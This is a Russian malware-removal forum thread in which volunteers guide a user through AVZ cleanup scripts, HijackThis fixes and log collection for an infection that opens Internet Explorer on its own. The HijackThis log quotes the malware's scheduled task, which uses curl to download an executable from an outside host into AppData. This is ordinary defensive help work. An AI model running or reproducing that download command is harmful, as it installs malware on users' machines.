Перейти к содержанию

Internet Explorer запускается сам по себе и автоматически направляет на опасные веб-адреса


Алексей Корякин

Рекомендуемые сообщения

по поводу интсрукции пункт номер 2 непонимаю как сделать.

  1. Отключите Sandbox (Песочница) / Defense+ (Щелкните правой кнопкой мыши по иконке CIS > Sandbox/Defense+ Security Level > Disable). Это позволит беспрепятственно отключить и удалить CIS и другие защищённые приложения

Иконки COMODO у меня нет... и в удалить/изменить программы там тоже уже нет COMODO.

Ссылка на комментарий
Поделиться на другие сайты

  • Ответов 71
  • Created
  • Последний ответ

Top Posters In This Topic

  • Алексей Корякин

    38

  • regist

    28

  • Sandor

    5

  • thyrex

    1

В DOS-окне ("черный экран" на Вашем скрине) введите 1 и нажмите Enter.

сделал! все прошло в штатном режиме, в конце написано было Completed.

Вообщем сейчас снова сделаю выполнение скриптов AVZ  с отключением антивируса и запуском от админа, а также свежие логи от Автологера. отчеты прикреплю.....

 

P.S на данный момент чего мы добились:  после перезагрузки ПК, автоматически уже не запускается Explorer, это радует, но оповещения от Касперского продолжают поступать 1-2 сообщения о том что заблокирован опасный веб-адрес. периодичность примерно 2 раза за 25-30 минут.

Заново сделал: 

1.  отправил свежий архив на проверку файл: virusinfo_auto_ЛЕША-ПК.zip

Ссылка на результаты анализа:  https://virusinfo.info/virusdetector/report.php?md5=19C663FF799F2D337D67F1529FEB67C7

2. сейчас буду  заново выполнять скрипты в АВЗ. ожидайте...

Закончил по скриптам: -  свежий Файл quarantine.zip из папки AVZ отправлю сейчас  по адресу newvirus@kaspersky.com

 свежий Отчёт о работе по ClearLNK

Осталось заново запустить Автологер, отчеты прикреплю скоро

ClearLNK-06.07.2017_16-04.log

Ссылка на комментарий
Поделиться на другие сайты

Свежий лог Автологера жду.

делается, думаю 1-2 минуты и будет готов, номер KLAN пока не пришел.

Свежий лог Автологера жду.

Готов: 

Жду указаний, стал уже специалистом)))))) пока что включил Касперского пусть поработает....

CollectionLog-2017.07.06-16.17.zip

Изменено пользователем Алексей Корякин
Ссылка на комментарий
Поделиться на другие сайты

1) Ещё раз пройдитесь утилитой для удаления хвостов комода. У вас они до сих пор остались.

 

2)
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО, отключать надо не на 30 минут, а совсем. Назад потом вручную включите, когда закончите процедуры.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт), запускать обязательно от имени Адмистратора:

begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(True);
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\Леша\AppData\Local\yc\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFileF('C:\Users\Леша\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\Леша\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\Леша\AppData\Roaming\curl\');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

после выполнения скрипта компьютер перезагрузится.
после перезагрузки выполнить второй скрипт:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip из папки AVZ отправьте с помощью этой формы или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения. с указанием пароля: virus в теле письма.

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.
Ссылка на комментарий
Поделиться на другие сайты

Файл quarantine.zip из папки AVZ отправил на этот почтовый ящик: quarantine (собака) safezone.cc


хвосты почистил от комодо заново через Uninstaller Tool

Изменено пользователем Алексей Корякин
Ссылка на комментарий
Поделиться на другие сайты

вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю


звежий анализ от автологера вот


убегаю по делам буду чуть позже. всем спасибо за помощь

post-46503-0-45494400-1499430024_thumb.jpg

CollectionLog-2017.07.07-15.16.zip

Ссылка на комментарий
Поделиться на другие сайты

 

 


вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю
Поставьте драйвера заново.

 

 

 


Файл quarantine.zip из папки AVZ
Вы не его, а неизвестно что отправили. Пришлите что просили.
Ссылка на комментарий
Поделиться на другие сайты

 

вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю

Поставьте драйвера заново.

 

 

 

Файл quarantine.zip из папки AVZ

Вы не его, а неизвестно что отправили. Пришлите что просили.

 

как не его?вот скрин из моих исходящих

 

Regist, я повторно отправил свежий quarantine.zip через сервис http://www.oszone.net/virusnet/

 

вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю

Поставьте драйвера заново.

 

 

 

Файл quarantine.zip из папки AVZ

Вы не его, а неизвестно что отправили. Пришлите что просили.

Regist, я повторно отправил свежий quarantine.zip через сервис http://www.oszone.net/virusnet/

извеняюсь не получается отправить там суммарный объем не должен превышать 8 мб. а у меня он весит только 46 мб. сейчас тогда снова отправлю просто на почту quarantine@safezone.cc.

все, только что отправил quarantine.zip из папки AVZ на quarantine@safezone.cc.

вот скрин :

post-46503-0-49458100-1499437824_thumb.jpg

post-46503-0-92379900-1499439441_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

как не его?вот скрин из моих исходящих

Не знаю, что у вас на скрине, но вы прислали файл "narod_attachment_links.html" весом в 1 Kb.

 

 

извеняюсь не получается отправить там суммарный объем не должен превышать 8 мб. а у меня он весит только 46 мб.

Выложите тогда на обменник или в облако и ссылку мне в ЛС. Изменено пользователем regist
Ссылка на комментарий
Поделиться на другие сайты

 

как не его?вот скрин из моих исходящих

Не знаю, что у вас на скрине, но вы прислали файл "narod_attachment_links.html" весом в 1 Kb.

 

 

извеняюсь не получается отправить там суммарный объем не должен превышать 8 мб. а у меня он весит только 46 мб.

Выложите тогда на обменник или в облако и ссылку мне в ЛС.

 

отправил в лс ссылку

Ссылка на комментарий
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O2 - BHO: (no name) - {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} - (no file)
O4 - MSConfig\startupfolder: C:^Users^Леша^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^FlylinkDC++.lnk - C:\Program Files\FlylinkDC++\FlylinkDC.exe (2013/08/02) (file missing)
O4 - MSConfig\startupfolder: C:^Users^Леша^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Punto Switcher.lnk - C:\Program Files\Yandex\Punto Switcher\punto.exe (2015/10/25) (file missing)
O4 - MSConfig\startupreg: [SunJavaUpdateSched] C:\Program Files\Common Files\Java\Java Update\jusched.exe  (file missing) (HKLM) (2013/08/02)
O4 - MSConfig\startupreg: [VKSaver] C:\ProgramData\VKSaver\VKSaver.exe  (file missing) (HKLM) (2013/08/02)
O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Extra context menu item: Закачать при помощи Download Master - (no file)
O8 - Extra context menu item: Передать на удаленную закачку DM - (no file)
O9 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O22 - Task (Ready): MSI - C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="Program Files\videomaster_5_0_repack_by_kaktustv_exe_tfile_ru_torrent___.exe" (file missing)
O22 - Task (Ready): VKSaverUpdate - C:\ProgramData\VKSaver\VKSaver.exe -autoupdate (file missing)
O22 - Task (Ready): curl - C:\Users\Леша\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Леша\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\Леша\AppData\Roaming\curl\curl.exe (file missing)

 

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • tintin
      От tintin
      Постоянно вылетает сообщение Microsoft Internet Explorer: выключен защищенный режим. Нажимаю исправить, через 20 секунд опять вылетает. Полное сканирование ничего не находит. 
      Подскажите как быть.
      Спасибо.
       
       

      CollectionLog-2024.05.23-13.06.zip
    • ska79
      От ska79
      Правильно ли я понимаю что автоматическое получение dns возможно только если ip адрес тоже выставлен назначатться автоматически?

    • ds02
      От ds02
      Постоянно вылетает сообщение Microsoft Internet Explorer: выключен защищенный режим. Нажимаю исправить, через 20 секунд опять вылетает. Полное сканирование ничего не находит. Что это такое?
      CollectionLog-2024.01.05-19.02.zip
    • le_vla_kor
      От le_vla_kor
      В один день просто перестал запускаться касперский на ПК. Появился Antimalware Service executable который постоянно работает и просто нагружает память (?). Иногда идет нагрузка на диск. Пробовал перезагружаться, при попытке переустановки сам установщик не запускается. Проверился KVRT.exe - ничего не нашло

      CollectionLog-2022.11.27-14.24.zip
    • KL FC Bot
      От KL FC Bot
      Существует ряд довольно простых правил безопасного онлайн-шоппинга, которые помогают защититься от типичных мошеннических схем и не потерять свои деньги. Они сводятся к следующему: не переводите деньги на личные счета незнакомых людей в Интернете, не вводите данные своей карточки на сомнительных сайтах и внимательно проверяйте адреса страниц прежде, чем оставлять на них платежную информацию.
      Однако немногие знают, что угнать карту могут не только на мошеннических и фейковых сайтах, но и на совершенно настоящих. Это может произойти в результате заражения страницы веб-скиммерами — вредоносными программами, внедряемыми непосредственно в код сайта. О них мы сегодня и поговорим.
      Что такое веб-скиммеры
      Веб-скиммеры получили свое название по аналогии с обычными физическими скиммерами. То есть устройствами, которые тем или иным образом незаметно встраиваются в банкоматы или терминалы оплаты для того, чтобы воровать данные карт. Поскольку эти устройства либо незаметны, либо с виду очень похожи на привычное оборудование, ничего не подозревающий человек вставляет в банкомат или прокатывает в терминале свою карточку и тем самым отдает преступникам платежные данные.
      Уже достаточно давно мошенники сообразили, что совсем не обязательно возиться с физическими устройствами и рисковать быть буквально пойманными за руку. Можно сделать все то же самое гораздо проще, с меньшим риском и полностью удаленно. Для этого необходимо написать небольшой кусочек кода, который после внедрения на сайт, где пользователи расплачиваются картами, будет данные этих карт перехватывать и отправлять куда следует. Вот такой код и называется веб-скиммером.
      Преступники ищут уязвимые онлайн-магазины и прочие сайты, предполагающие оплату картой, взламывают их и устанавливают незаметно для владельцев свой вредоносный код. Вот, собственно, и все. Остается только собрать вводимые пользователями данные карт в базу данных и продать эту базу где-нибудь в даркнете другим преступникам, специализирующимся на краже средств с банковских карт.
       
      Посмотреть полную статью

×
×
  • Создать...